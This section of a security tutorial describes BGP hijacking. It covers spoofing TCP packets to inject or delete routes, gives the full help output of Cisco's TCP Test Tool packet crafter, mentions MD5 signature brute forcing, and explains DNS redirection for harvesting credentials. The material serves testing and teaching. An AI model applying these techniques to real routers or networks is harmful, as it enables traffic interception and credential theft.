BGP Hijacking attacks on Core Networks

Several tools capable of launching BGP hijacking attacks are freely available for download on the Internet. A vigilant system administrator or a penetration tester can employ them to test her own or the client's network to evaluate its resilience to BGP hijacking attacks that can be potentially launched by hackers. In this section, we review two such a tools that are useful for launching a variety of BGP hijacking attacks against routing mechanisms and domain system.

BGP Hijacking Attack
In order to communicate with a speaker in an existing BGP session formed by the speaker itself and its legitimate peer, the hacker needs to acquire more information about the session. They must obtain the source IP address of the peer, through the use of Traceroute for instance. Because in a TCP connection a port number is required, it must be spoofed. Furthermore, the hacker is required to use a correct sequence number (i.e. the way TCP keeps track of the order of packets) and TTL (Time To Live) attribute. TTL is a number that represents the maximum number of hops a packet can take; and is used as a safety mechanism to drop the lost packets. Generally, BGP peer sessions are directly connected, so that the TTL is set to 1. The hacker needs to set the TTL accordingly so that it is received when its value is 1. Crafting this attack is not an easy task since it will require extra BGP session knowledge. However, if accomplished, the targeted speaker will think that the message is legitimate and processes it as if it was sent from its peer, allowing e.g. false route injection, route deletion, etc.

Setting up an unauthorised BGP session with a peer
Since a TCP session is required for peers to establish a BGP session, BGP inherits all TCP based attacks. A hacker can use foot printing and reconnaissance techniques to gather information about an AS. If they can discover the IP address of a BGP speaker, its peer, and the ports used for a session, they can spoof the TCP packets with the source IP address and port number of the peer. By making sure that the TTL arrives with a value not greater than 1, they can establish an unauthorised TCP session with the speaker. This attack can lead to adding false routes or retrieving existing ones for example.

Cisco TCP Test Tool
The TCP Test Tool was written by the Cisco development team (Critical Infrastructure Assurance Group, or CIAG) to perform security assessments on Cisco devices. It allows the user to craft and send customized TCP packets with any payload. This tool has inherited many of the ideas of the Nemesis packet-construction project. As you can see, a vast amount of options is available to the hacker to create a firm testing environment. The TCP Test Tool (ttt) can be obtained from the Cisco Systems web site here ttt-1.3.tar.gz

     root $ ./ttt --help
     TCP Test Tool (ttt) Version 1.3
     Eloy Paris (elparis@cisco.com)
     From ideas by Sean Convery (sean@cisco.com) and the NEMESIS Project
     Usage: ttt [-h] [options]
     General options:
       -h, --help                     display this help and exit
       -c, --count NUM                number of segments to send (default is 1)
       -d, --delay NUM                delay in milliseconds (default is 0)
           --flood NUM                 flood the network by sending NUM packets


     TCP options:
       -x, --sport NUM                TCP source port
       -y, --dport NUM                TCP destination port
       -f, --tcpflags                  TCP flags
           -fS SYN, -fA ACK, -fR RST, -fP PSH, -fF FIN, -fU URG
          (can also use --syn, --ack, --rst, --psh, --fin, and --urg)
       -w, --window NUM               window size
       -s, --sequence NUM             sequence number (^ to increment by window)
       -a, --acknowledgement NUM      acknowledgement number
       -u, --urgent NUM               urgent pointer
       -P, --payload FILE             payload file (use stdin if FILE is '-')
       -5, --md5 SECRET               use TCP MD5 signatures (TCP option 19)
           --mss NUM                  TCP maximum segment size
           --wscale NUM               window scale option
           --nocksum                  don't compute TCP checksums
     IP options:
       -S, --src ADDRESS              source IP address
       -D, --dst ADDRESS              destination IP address
       -I, --id NUM                   IP ID
       -T, --ttl NUM                  IP time to live
       -t, --tos NUM                  IP type of service
   
This utility can also be used from a scripting platform to generate random payload or specific options, such as BGP hijacking or BGP bruteforcing, as has been done with tcpsig-crack.pl in the examples directory. An attacker or penetration tester can generate a large amount of testing scenarios with this suite, which are limited only by the user's imagination.

DNS attacks
Many hackers aim to corrupt the Domain Name System (DNS) through routing attacks. This might allow, for instance, the hacker to collect personal users’ data such as banking information and passwords. After a successful routing attack, a hacker can attack the DNS and lure traffic towards a compromised web server for example. When a user uses a service where credentials are required, the hacker can get hold of them. Other more damaging attacks can be conducted using interdomain routing as a proxy. For instance, the hacker can use a BGP-based attack to masquerade as root DNS servers. This provides the hacker with a huge amount of flexibility and the potential to cause immense damage to the Internet community.